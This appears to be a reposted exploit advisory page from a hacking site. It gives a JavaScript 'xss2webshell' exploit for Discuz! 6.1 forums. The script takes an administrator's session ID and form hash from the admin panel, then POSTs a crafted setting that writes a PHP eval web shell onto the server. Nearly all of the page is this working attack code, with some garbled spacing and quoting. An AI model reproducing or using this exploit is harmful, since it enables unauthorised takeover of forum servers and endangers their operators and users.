Discuz! 6.1 xss2webshell Exploit-vulnerability warning-the black bar safety net

2008-11-2800:00:00

佚名

www.myhack58.com

JSON

/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2 0 0 8-1 0] Exploit
by 80vul-A
team: http://www.80vul.com
#############################################
*/
//Target url
var siteurl=‘http://www.80vul.com/Discuz_6.1.0/’;

//Get the sid
xmlhttp. open(“GET”, siteurl+“admincp. php? frames=yes”, false);
//firefox3 can’t use xmlhttp. send(); http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html
//thx [email protected]
xmlhttp. send(null);
var echo = xmlhttp. responseText;
var reg = /action=home&sid=([\w\d]+)" /i;
var arr=reg. exec(echo);
if(! arr){
//Does not log in the background
//alert(document. cookie);
}else{
var sid=arr[1];
}

//Get the formhash
xmlhttp. open(“GET”, siteurl+“admincp. php? action=home&sid=”+sid, false);
xmlhttp. send(null);
var echo = xmlhttp. responseText;
var reg = / name="formhash" value="([\w\d]+)"/i;
var arr=reg. exec(echo);
window. onerror=function(){return true;}
var formhash=arr[1];
//alert(formhash);

//By the SODB-2 0 0 8-1 0 write webshell
//http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
xmlhttp. open(“POST”, siteurl+“admincp. php? action=runwizard&step=3”, false);
xmlhttp. setRequestHeader(“Referer”, siteurl);
xmlhttp. setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded”);
xmlhttp. send(unescape(“settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.& amp;settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww. comsenz. com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash=”+formhash));

JSON